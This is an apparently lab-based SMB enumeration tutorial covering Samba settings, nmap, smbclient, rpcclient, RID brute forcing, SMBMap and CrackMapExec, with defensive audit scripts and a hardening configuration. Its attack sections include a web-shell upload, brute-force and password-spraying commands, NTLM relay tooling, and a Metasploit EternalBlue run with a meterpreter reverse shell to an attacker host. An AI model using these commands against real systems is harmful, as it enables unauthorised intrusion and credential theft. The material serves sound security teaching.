SMB Enumeration
Protocol Overview
SMB Characteristics:
Ports: 139 (NetBIOS), 445 (Direct SMB)
Protocol: TCP-based
Purpose: File/printer sharing, network resource access
Implementation: Windows (native), Linux (Samba)
SMB Versions:

| Version | Introduced with | Notable features |
| --- | --- | --- |
| CIFS/SMB 1.0 | Windows NT 4.0/2000 | NetBIOS interface, Direct TCP |
| SMB 2.0 | Windows Vista/2008 | Performance upgrades, message signing |
| SMB 2.1 | Windows 7/2008 R2 | Locking mechanisms |
| SMB 3.0 | Windows 8/2012 | Multichannel, end-to-end encryption |
| SMB 3.1.1 | Windows 10/2016 | AES-128 encryption, integrity checking |
Samba Implementation:
Purpose: SMB/CIFS implementation for Unix-based systems
Components: smbd (SMB daemon), nmbd (NetBIOS daemon)
Active Directory: Full domain controller capabilities (v4+)
Common SMB Configurations

Samba Configuration File

```bash
# Main configuration file, shown without comment lines (# and ;)
cat /etc/samba/smb.conf | grep -v "#\|\;"
```

```ini
[global]
workgroup = DEV.INFREIGHT.HTB
server string = DEVSMB
log file = /var/log/samba/log.%m
max log size = 1000
server role = standalone server
map to guest = bad user
usershare allow guests = yes

[printers]
comment = All Printers
browseable = no
path = /var/spool/samba
printable = yes
guest ok = no

[notes]
comment = CheckIT
path = /mnt/notes/
browseable = yes
read only = no
writable = yes
guest ok = yes
```

Key Configuration Settings

| Setting | Meaning | Relevance for enumeration |
| --- | --- | --- |
| [sharename] | Network share name | Enumeration target |
| workgroup = WORKGROUP | Workgroup/domain name | Domain information |
| path = /path/here/ | Directory path | File system access |
| server string = STRING | Banner information | Information disclosure |
| usershare allow guests = yes | Guest access | Anonymous enumeration |
| map to guest = bad user | Invalid user handling | Authentication bypass |
| browseable = yes | Share visibility | Share enumeration |
| guest ok = yes | Anonymous access | Unauthenticated access |
| read only = no | Write permissions | File upload capability |
| writable = yes | Write access | Malicious file upload |
Dangerous SMB Settings

High-Risk Configurations

```ini
browseable = yes            # Allow share listing
read only = no              # Enable write access
writable = yes              # Allow file modification
guest ok = yes              # Anonymous access
enable privileges = yes     # Honor SID privileges
create mask = 0777          # Full permissions for new files
directory mask = 0777       # Full permissions for directories
logon script = script.sh    # Login script execution
magic script = script.sh    # Script on connection close
magic output = script.out   # Script output location
```
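As an added example (not code from the original page or from the Samba project), the following Python script audits an smb.conf for the options listed in the two tables above. It parses the file into sections, applies one rule per option, and separately reports shares where guest access and write access coincide, which is the combination behind the "Malicious file upload" row. The parser, severity labels and rule messages are this example's own; `include =` directives and `%` substitutions are not expanded. The embedded configuration is a constructed copy of the DEVSMB example with `create mask` and `magic script` added to the [notes] share.

```python
# Added example: audit an smb.conf for the high-risk options listed above.
# Not the page's or the Samba project's code. The parser handles Samba's
# INI-style layout ('[section]', 'option = value', '#'/';' comment lines);
# 'include =' and '%' substitutions are not expanded (assumption).
import re
from typing import Dict, List, Tuple

# Constructed sample: DEVSMB config above plus two extra high-risk options in [notes].
SAMPLE_SMB_CONF = """\
[global]
   workgroup = DEV.INFREIGHT.HTB
   server string = DEVSMB
   map to guest = bad user
   usershare allow guests = yes

[printers]
   browseable = no
   path = /var/spool/samba
   printable = yes
   guest ok = no

[notes]
   path = /mnt/notes/
   browseable = yes
   read only = no
   writable = yes
   guest ok = yes
   create mask = 0777
   magic script = script.sh
"""

Section = Dict[str, str]

def parse_smb_conf(text: str) -> Dict[str, Section]:
    """Return {section: {option: value}}; option names are lower-cased
    because Samba treats them case-insensitively."""
    sections: Dict[str, Section] = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        header = re.fullmatch(r"\[(.+)\]", line)
        if header:
            current = header.group(1).strip()
            sections.setdefault(current, {})
        elif current is not None and "=" in line:
            key, _, value = line.partition("=")
            sections[current][key.strip().lower()] = value.strip()
    return sections

def _true(v: str) -> bool: return v.lower() in {"yes", "true", "1"}
def _false(v: str) -> bool: return v.lower() in {"no", "false", "0"}
def _world_writable(m: str) -> bool: return m.lstrip("0") == "777"  # 0777 / 777

# (option, predicate on its value, severity, message); 'writeable' is the alias Samba accepts.
RULES = [
    ("guest ok", _true, "high", "guest (anonymous) access allowed"),
    ("read only", _false, "high", "write access enabled"),
    ("writable", _true, "high", "write access enabled"),
    ("writeable", _true, "high", "write access enabled"),
    ("magic script", bool, "high", "script run on the server at connection close"),
    ("logon script", bool, "medium", "logon script delivered to clients"),
    ("map to guest", lambda v: v.lower() != "never", "medium", "failed logons mapped to guest"),
    ("usershare allow guests", _true, "medium", "user shares may admit guests"),
    ("enable privileges", _true, "medium", "SID privileges honoured"),
    ("create mask", _world_writable, "medium", "new files are world-writable"),
    ("directory mask", _world_writable, "medium", "new directories are world-writable"),
    ("browseable", _true, "info", "share advertised in share listings"),
]

def audit(sections: Dict[str, Section]) -> List[Tuple[str, str, str, str, str]]:
    """Apply every rule to every section; yields (section, option, value, severity, message)."""
    findings = []
    for name, options in sections.items():
        for option, predicate, severity, message in RULES:
            value = options.get(option)
            if value is not None and predicate(value):
                findings.append((name, option, value, severity, message))
    return findings

def anonymous_writable_shares(sections: Dict[str, Section]) -> List[str]:
    """Shares combining guest and write access; Samba defaults apply when an option is absent."""
    exposed = []
    for name, options in sections.items():
        guest = _true(options.get("guest ok", "no"))
        writable = _false(options.get("read only", "yes")) or _true(
            options.get("writable", options.get("writeable", "no")))
        if name.lower() != "global" and guest and writable:
            exposed.append(name)
    return exposed

if __name__ == "__main__":
    conf = parse_smb_conf(SAMPLE_SMB_CONF)
    for section, option, value, severity, message in audit(conf):
        print(f"[{severity:<6}] [{section}] {option} = {value}: {message}")
    print("anonymous write access:", anonymous_writable_shares(conf))
```

To check a live server, feed `parse_smb_conf(open("/etc/samba/smb.conf").read())` to `audit`. Rules are applied to [global] as well, so defaults such as `map to guest` are reported once there rather than once per share. `browseable = yes` is Samba's default and is therefore only reported as information; on its own it exposes the share name, not its contents.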
SMB Enumeration Techniques

1. Nmap SMB Scanning

Basic SMB Scan:

```bash
# Standard SMB scan
sudo nmap -sV -sC -p139,445 target_ip

# SMB-specific scripts
sudo nmap -p445 --script smb-* target_ip
```

Available Nmap SMB Scripts:

```bash
# Find SMB scripts
find / -name "*smb*" 2>/dev/null | grep scripts
```

```text
smb-enum-domains.nse     # Domain enumeration
smb-enum-groups.nse      # Group enumeration
smb-enum-processes.nse   # Process enumeration
smb-enum-sessions.nse    # Session enumeration
smb-enum-shares.nse      # Share enumeration
smb-enum-users.nse       # User enumeration
smb-os-discovery.nse     # OS information
smb-protocols.nse        # Protocol versions
smb-security-mode.nse    # Security settings
smb-server-stats.nse     # Server statistics
smb-system-info.nse      # System information
smb-vuln-*.nse           # Vulnerability checks
```

Example Nmap Output:

```text
PORT    STATE SERVICE     VERSION
139/tcp open  netbios-ssn Samba smbd 4.6.2
445/tcp open  netbios-ssn Samba smbd 4.6.2

Host script results:
|_nbstat: NetBIOS name: HTB, NetBIOS user: <unknown>, NetBIOS MAC: <unknown>
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2021-09-19T13:16:04
|_  start_date: N/A
```
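Added example, not code from the page or from the Nmap project: a Python parser that turns the normal-format scan output above into triage findings, namely the service banner, the SMB2 dialects offered, and whether message signing is required. The `Message signing enabled but not required` line is the condition the relay attacks listed later on this page depend on, so a defender reviewing scan results wants it surfaced rather than buried in script output. The sample is the output above, re-indented the way Nmap prints nested script results; the `findings` wording and the structure returned by `parse_nmap_smb` are this example's own.

```python
# Added example: triage of the Nmap SMB output shown above. Not the page's or
# the Nmap project's code. It reads the port table and the host-script block
# of a normal-format scan and extracts the banner, the SMB2 dialects and the
# message-signing state. Sample is the output above, re-indented (constructed).
import re
from typing import Dict, List, Optional

SAMPLE_NMAP_OUTPUT = """\
PORT    STATE SERVICE     VERSION
139/tcp open  netbios-ssn Samba smbd 4.6.2
445/tcp open  netbios-ssn Samba smbd 4.6.2

Host script results:
|_nbstat: NetBIOS name: HTB, NetBIOS user: <unknown>, NetBIOS MAC: <unknown>
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2021-09-19T13:16:04
|_  start_date: N/A
"""

PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")
SCRIPT_LINE_RE = re.compile(r"^\|_?( *)(.*)$")  # '|' or '|_', indent, text

def parse_nmap_smb(output: str) -> dict:
    """Return {'ports': {port: {...}}, 'scripts': {name: [nested lines]}}.
    A script line indented 0-1 spaces after the bar starts a new script;
    deeper indentation belongs to the current script."""
    ports: Dict[int, Dict[str, str]] = {}
    scripts: Dict[str, List[str]] = {}
    current: Optional[str] = None
    for line in output.splitlines():
        m = PORT_RE.match(line)
        if m:
            ports[int(m.group(1))] = {"proto": m.group(2), "state": m.group(3),
                                      "service": m.group(4), "version": m.group(5).strip()}
            continue
        m = SCRIPT_LINE_RE.match(line)
        if not m or not m.group(2).strip():
            continue
        indent, body = len(m.group(1)), m.group(2).strip()
        if indent <= 1:
            name, _, rest = body.partition(":")
            current = name.strip()
            scripts[current] = [rest.strip()] if rest.strip() else []
        elif current is not None:
            scripts[current].append(body)
    return {"ports": ports, "scripts": scripts}

def smb2_dialects(parsed: dict) -> List[str]:
    """Dialect numbers listed by smb2-security-mode, e.g. ['2.02', '3.11']."""
    return [l[:-1] for l in parsed["scripts"].get("smb2-security-mode", [])
            if re.fullmatch(r"\d+\.\d+:", l)]

def signing_required(parsed: dict) -> Optional[bool]:
    """True/False from the smb2-security-mode text; None if the script did not run."""
    for l in parsed["scripts"].get("smb2-security-mode", []):
        if "signing" in l.lower():
            return "enabled and required" in l.lower()
    return None

def findings(parsed: dict) -> List[str]:
    """Human-readable triage lines for one host."""
    out = []
    open_ports = sorted(p for p, i in parsed["ports"].items() if i["state"] == "open")
    if open_ports:
        version = parsed["ports"][open_ports[0]]["version"] or "version unknown"
        out.append(f"SMB service on {open_ports}: {version}")
    if smb2_dialects(parsed):
        out.append("SMB2 dialects offered: " + ", ".join(smb2_dialects(parsed)))
    required = signing_required(parsed)
    if required is False:
        out.append("message signing not required: sessions can be relayed or tampered with")
    elif required is None:
        out.append("signing state unknown: run --script smb2-security-mode")
    if "nbstat" in parsed["scripts"]:
        out.append("NetBIOS name service answered: " + parsed["scripts"]["nbstat"][0])
    return out

if __name__ == "__main__":
    for line in findings(parse_nmap_smb(SAMPLE_NMAP_OUTPUT)):
        print(line)
```

Pipe a saved `-oN` file into `parse_nmap_smb` per host block; `signing_required` returning `None` is itself a finding, because a scan without `smb2-security-mode` says nothing about relay exposure.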
2. SMBclient Enumeration

Share Listing:

```bash
# List shares with null session
smbclient -N -L //target_ip

# Connect to specific share
smbclient //target_ip/sharename

# Anonymous connection
smbclient -N //target_ip/sharename
```

SMBclient Commands:

```text
# Directory operations
smb: \> ls                 # List directory contents
smb: \> cd directory       # Change directory
smb: \> pwd                # Current directory
smb: \> mkdir newdir       # Create directory

# File operations
smb: \> get filename       # Download file
smb: \> put localfile      # Upload file
smb: \> mget *.txt         # Download multiple files
smb: \> del filename       # Delete file

# System commands
smb: \> !ls                # Execute local command
smb: \> help               # List available commands
```

Example SMBclient Session:

```text
smbclient //10.129.14.128/notes
Enter WORKGROUP\username's password:
Anonymous login successful
smb: \> ls
  .                                   D        0  Wed Sep 22 18:17:51 2021
  ..                                  D        0  Wed Sep 22 12:03:59 2021
  prep-prod.txt                       N       71  Sun Sep 19 15:45:21 2021
smb: \> get prep-prod.txt
getting file \prep-prod.txt of size 71 as prep-prod.txt (8.7 KiloBytes/sec)
smb: \> !cat prep-prod.txt
[] check your code with the templates
[] run code-assessment.py
```

3. RPCclient Enumeration
RPC Connection:

```bash
# Connect with null session
rpcclient -U "" target_ip
rpcclient -N target_ip

# Alternative authentication
rpcclient -U "username" target_ip
```

RPCclient Commands:

| Command | Purpose |
| --- | --- |
| srvinfo | Server information |
| enumdomains | Enumerate domains |
| querydominfo | Domain information |
| netshareenumall | List all shares |
| netsharegetinfo <share> | Share information |
| enumdomusers | Enumerate domain users |
| queryuser <RID> | User information |
| enumdomgroups | Enumerate groups |
| querygroup <RID> | Group information |

Example RPCclient Session:

```text
rpcclient $> srvinfo
        DEVSMB         Wk Sv PrQ Unx NT SNT DEVSM
        platform_id     :       500
        os version      :       6.1
        server type     :       0x809a03
rpcclient $> enumdomains
name:[DEVSMB] idx:[0x0]
name:[Builtin] idx:[0x1]
rpcclient $> netshareenumall
netname: notes
        remark: CheckIT
        path:   C:\mnt\notes\
        password:
rpcclient $> enumdomusers
user:[mrb3n] rid:[0x3e8]
user:[cry0l1t3] rid:[0x3e9]
rpcclient $> queryuser 0x3e9
        User Name   :   cry0l1t3
        Full Name   :   cry0l1t3
        Home Drive  :   \\devsmb\cry0l1t3
        Profile Path:   \\devsmb\cry0l1t3\profile
        Password last set Time   :      Mi, 22 Sep 2021 17:50:56 CEST
```

4. User RID Brute Forcing
Bash RID Enumeration:

```bash
# Brute force RIDs 500-1100 over a null session; printf converts each
# decimal RID into the hex form queryuser expects
for i in $(seq 500 1100); do
    rpcclient -N -U "" target_ip -c "queryuser 0x$(printf '%x\n' "$i")" |
        grep "User Name\|user_rid\|group_rid" && echo ""
done
```

Results:

```text
User Name   :   sambauser
user_rid :      0x1f5
group_rid:      0x201

User Name   :   mrb3n
user_rid :      0x3e8
group_rid:      0x201
```

Impacket samrdump.py:

```bash
# Automated user enumeration
samrdump.py target_ip
```

Example output:

```text
Found user: mrb3n, uid = 1000
Found user: cry0l1t3, uid = 1001
mrb3n (1000)/FullName:
mrb3n (1000)/PasswordLastSet: 2021-09-22 17:47:59
cry0l1t3 (1001)/FullName: cry0l1t3
cry0l1t3 (1001)/PasswordLastSet: 2021-09-22 17:50:56
```

5. Advanced SMB Tools
SMBMap:

```bash
# Basic share enumeration
smbmap -H target_ip

# With credentials
smbmap -H target_ip -u username -p password

# Recursive directory listing
smbmap -H target_ip -R
```

Example output:

```text
[+] IP: 10.129.14.128:445    Name: 10.129.14.128
        Disk                     Permissions    Comment
        ----                     -----------    -------
        print$                   NO ACCESS      Printer Drivers
        home                     NO ACCESS      INFREIGHT Samba
        dev                      NO ACCESS      DEVenv
        notes                    READ, WRITE    CheckIT
        IPC$                     NO ACCESS      IPC Service (DEVSM)
```
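Added example, not code from the page or from the SMBMap project: a Python parser that turns the share table above into a per-host list of exposed shares. Because the listing comes from `smbmap -H` run without credentials, every READ or WRITE permission it shows is reachable anonymously, which is exactly the "Anonymous Access" and "Excessive Share Permissions" issues described below. The sample reproduces the output above (SMBMap prints `READ, WRITE` with a space) plus a second, constructed host so the grouping is visible; the record layout and function names are this example's own.

```python
# Added example: turn the SMBMap share table above into a list of exposed
# shares. Not the page's or the SMBMap project's code. It parses the listing
# from 'smbmap -H <host>' run without credentials, so every READ or WRITE in
# it is reachable anonymously. Sample: the output above plus a constructed
# second host.
import re
from typing import Dict, List

SAMPLE_SMBMAP_OUTPUT = """\
[+] IP: 10.129.14.128:445    Name: 10.129.14.128
        Disk                     Permissions    Comment
        ----                     -----------    -------
        print$                   NO ACCESS      Printer Drivers
        home                     NO ACCESS      INFREIGHT Samba
        dev                      NO ACCESS      DEVenv
        notes                    READ, WRITE    CheckIT
        IPC$                     NO ACCESS      IPC Service (DEVSM)
[+] IP: 10.129.14.129:445    Name: files.example.test
        Disk                     Permissions    Comment
        ----                     -----------    -------
        public                   READ ONLY      constructed second host
        IPC$                     NO ACCESS      IPC Service
"""

HOST_RE = re.compile(r"\[\+\] IP: (\S+?):(\d+)\s+Name: (\S+)")
# share name, one of SMBMap's permission strings, free-text comment; the
# column separator may be tabs or runs of spaces.
SHARE_RE = re.compile(r"^\s*(\S.*?)\s+(NO ACCESS|READ ONLY|READ,\s*WRITE|WRITE ONLY)\s*(.*)$")

def parse_smbmap(output: str) -> List[Dict[str, object]]:
    """One record per share: host, share name, perms set ({'READ', 'WRITE'}), comment."""
    shares, host = [], None
    for line in output.splitlines():
        h = HOST_RE.search(line)
        if h:
            host = h.group(1)
            continue
        s = SHARE_RE.match(line)
        if s and host:
            shares.append({"host": host, "share": s.group(1).strip(),
                           "perms": set(re.findall(r"READ|WRITE", s.group(2))),
                           "comment": s.group(3).strip()})
    return shares

def exposed_shares(shares, need: str = "READ") -> Dict[str, List[str]]:
    """host -> share names granting 'need' ('READ' or 'WRITE') to the scanning identity."""
    exposed: Dict[str, List[str]] = {}
    for s in shares:
        if need in s["perms"]:
            exposed.setdefault(s["host"], []).append(s["share"])
    return exposed

if __name__ == "__main__":
    found = parse_smbmap(SAMPLE_SMBMAP_OUTPUT)
    print("anonymous read :", exposed_shares(found, "READ"))
    print("anonymous write:", exposed_shares(found, "WRITE"))
```

The same parser works on output captured with credentials; the result then describes what that account can reach, so keep the anonymous run separate when deciding which shares need `guest ok = no`.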
CrackMapExec:

```bash
# Share enumeration
crackmapexec smb target_ip --shares -u '' -p ''

# User enumeration
crackmapexec smb target_ip -u '' -p '' --users

# Password spraying
crackmapexec smb target_ip -u users.txt -p passwords.txt
```

Example output:

```text
SMB    10.129.14.128   445    DEVSMB    [+] Enumerated shares
SMB    10.129.14.128   445    DEVSMB    Share    Permissions    Remark
SMB    10.129.14.128   445    DEVSMB    notes    READ,WRITE     CheckIT
```

Enum4Linux-ng:

```bash
# Installation
git clone https://github.com/cddmp/enum4linux-ng.git
cd enum4linux-ng
pip3 install -r requirements.txt

# Comprehensive enumeration
./enum4linux-ng.py target_ip -A

# Specific enumeration
./enum4linux-ng.py target_ip -U   # Users
./enum4linux-ng.py target_ip -S   # Shares
./enum4linux-ng.py target_ip -G   # Groups
```

SMB Security Issues
1. Anonymous Access
Risk: Unauthorized share access and information disclosure
Detection: Null session connections
Exploitation: Data theft, user enumeration
2. Weak Authentication
Risk: Credential-based attacks
Detection: Password spraying, brute force
Exploitation: Account compromise
3. Excessive Share Permissions
Risk: Unauthorized file access/modification
Detection: Permission enumeration
Exploitation: Data manipulation, malware deployment
4. Information Disclosure
Risk: Sensitive data exposure
Detection: Share browsing, file enumeration
Exploitation: Intelligence gathering
SMB Attack Vectors

1. Share Exploitation

```bash
# File upload for web shells
smbclient //target/webshare
smb: \> put shell.php

# Configuration file access
smbclient //target/config
smb: \> get database.conf
```

2. Password Attacks

```bash
# Hydra SMB brute force
hydra -l user -P passwords.txt smb://target_ip

# CrackMapExec password spraying
crackmapexec smb target_ip -u users.txt -p 'Password123!'
```

3. Relay Attacks

```bash
# SMB relay with Responder
responder -I eth0 -A

# ntlmrelayx.py for relay attacks
ntlmrelayx.py -tf targets.txt -smb2support
```

Common Vulnerabilities
Critical SMB CVEs

| CVE | Name | Impact | Affected |
| --- | --- | --- | --- |
| CVE-2017-0144 | EternalBlue | Remote Code Execution | Windows Vista - Windows 10, Server 2008-2016 |
| CVE-2020-0796 | SMBGhost (CoronaBlue) | Remote Code Execution | Windows 10 v1903/v1909, Server v1903/v1909 |
| CVE-2017-7494 | SambaCry | Remote Code Execution | Samba 3.5.0 - 4.6.4/4.5.10/4.4.14 |
| CVE-2016-2118 | Badlock | Man-in-the-Middle | Windows/Samba NTLM authentication |
| CVE-2017-12149 | SMBLoris | Denial of Service | Windows SMB implementations |
EternalBlue (CVE-2017-0144)

```bash
# Nmap EternalBlue detection
nmap -p445 --script smb-vuln-ms17-010 target

# Metasploit exploitation
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS target
set payload windows/x64/meterpreter/reverse_tcp
set LHOST attacker_ip
exploit

# Manual verification
python checker.py target 445
```

SMBGhost (CVE-2020-0796)

```bash
# Detection script
nmap -p445 --script smb-vuln-cve2020-0796 target

# Proof of concept
python3 cve-2020-0796.py target

# Metasploit module
use auxiliary/scanner/smb/smb_ms20_004
set RHOSTS target
run
```

SambaCry (CVE-2017-7494)

```bash
# Vulnerability detection
nmap -p445 --script smb-vuln-cve2017-7494 target

# Manual check
smbclient //target/share -N
smb: \> allinfo /path/to/shared/library.so

# Exploitation requirements:
# - Samba version 3.5.0+
# - File upload to SMB share
# - Knowledge of share path on server
```

Badlock (CVE-2016-2118)

```bash
# NTLM authentication weaknesses
# Man-in-the-middle attacks on SMB authentication
# Affects both Windows and Samba implementations

# Detection
enum4linux-ng.py target -A | grep -i "signing"
rpcclient -N target -c "getdcname"
```

Additional SMB Vulnerabilities

CVE-2008-4250: MS08-067 Conficker vulnerability
CVE-2017-0145: EternalBlue variant (MS17-010)
CVE-2017-0146: EternalBlue variant (MS17-010)
CVE-2019-0708: BlueKeep (RDP, but often found with SMB)
CVE-2020-1472: Zerologon (NetLogon, SMB-related)

Vulnerability Scanning

```bash
# Comprehensive SMB vulnerability scan
nmap -p445 --script smb-vuln-* target

# Specific vulnerability checks
nmap -p445 --script smb-vuln-ms17-010 target       # EternalBlue
nmap -p445 --script smb-vuln-cve2020-0796 target   # SMBGhost
nmap -p445 --script smb-vuln-cve2017-7494 target   # SambaCry

# Metasploit auxiliary scanners
use auxiliary/scanner/smb/smb_ms17_010             # EternalBlue scanner
use auxiliary/scanner/smb/smb_ms20_004             # SMBGhost scanner
```

SMB Enumeration Checklist
Initial Reconnaissance
Share Enumeration
User Enumeration
Authentication Testing
Advanced Testing
Tools for SMB Enumeration

Built-in Tools

```bash
# SMB client
smbclient -L //target_ip

# RPC client
rpcclient -U "" target_ip

# NetBIOS enumeration
nmblookup -A target_ip
```

Specialized Tools

```bash
# SMBMap
smbmap -H target_ip

# CrackMapExec
crackmapexec smb target_ip --shares

# Enum4Linux-ng
enum4linux-ng.py target_ip -A

# Impacket tools
samrdump.py target_ip
smbexec.py domain/user:pass@target_ip
```

Nmap Scripts

```bash
# Comprehensive SMB scan
nmap -p445 --script smb-enum-*,smb-vuln-*,smb-os-discovery target_ip
```

Defensive Measures

SMB Server Hardening

Disable SMBv1 - Use SMBv2/v3 only
Restrict anonymous access - Disable null sessions
Implement strong authentication - Kerberos, NTLM restrictions
Use share-level permissions - Principle of least privilege
Enable message signing - Prevent tampering
Regular security updates - Patch known vulnerabilities

Network Security

Firewall restrictions - Block SMB ports externally
Network segmentation - Isolate file servers
Monitor SMB traffic - Detect anomalies
Implement SMB over VPN - Secure remote access
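The server-hardening items above map directly onto Samba options. The smb.conf below is an added example (not the page's configuration and not a Samba default) showing the DEVSMB setup rewritten so that each item is enforced: SMBv1 is refused with `server min protocol`, guest mapping and anonymous enumeration are turned off, LM/NTLMv1 are disabled, signing is mandatory, and the [notes] share becomes authenticated and read-only except for a named group. The `hosts allow` subnet and the `notes-editors` group are constructed placeholders, and Kerberos is not configured because it requires a domain-joined server rather than the standalone role used here.

```ini
[global]
   workgroup = DEV.INFREIGHT.HTB
   server role = standalone server
   # Generic banner instead of the host name (information disclosure row above)
   server string = file server

   # 1. Disable SMBv1: refuse every dialect below SMB2
   server min protocol = SMB2

   # 2. Restrict anonymous access: never map failed logons to guest, refuse
   #    anonymous IPC$/RPC enumeration (value 2 can break share browsing on
   #    some older Windows clients, so test before rolling out)
   map to guest = Never
   restrict anonymous = 2
   usershare allow guests = no

   # 3. Strong authentication: NTLMv2 only, no LM hashes
   ntlm auth = ntlmv2-only
   lanman auth = no

   # 5. Message signing required; encrypt where the client supports SMB3
   server signing = mandatory
   smb encrypt = desired

   # Network restriction and logging of authentication attempts for monitoring
   hosts allow = 10.129.14.0/24      ; constructed example subnet
   hosts deny = ALL
   log file = /var/log/samba/log.%m
   log level = 1 auth:3

[notes]
   comment = CheckIT
   path = /mnt/notes/
   # 4. Share-level least privilege: no guests, explicit user list,
   #    read-only by default, write only for one group, sane masks
   guest ok = no
   valid users = @notes-editors      ; constructed example group
   read only = yes
   write list = @notes-editors
   create mask = 0640
   directory mask = 0750
   browseable = no
```

After changing the file, `testparm` validates the syntax and prints the effective values, and the `smb2-security-mode` Nmap script from the enumeration section should then report that message signing is enabled and required.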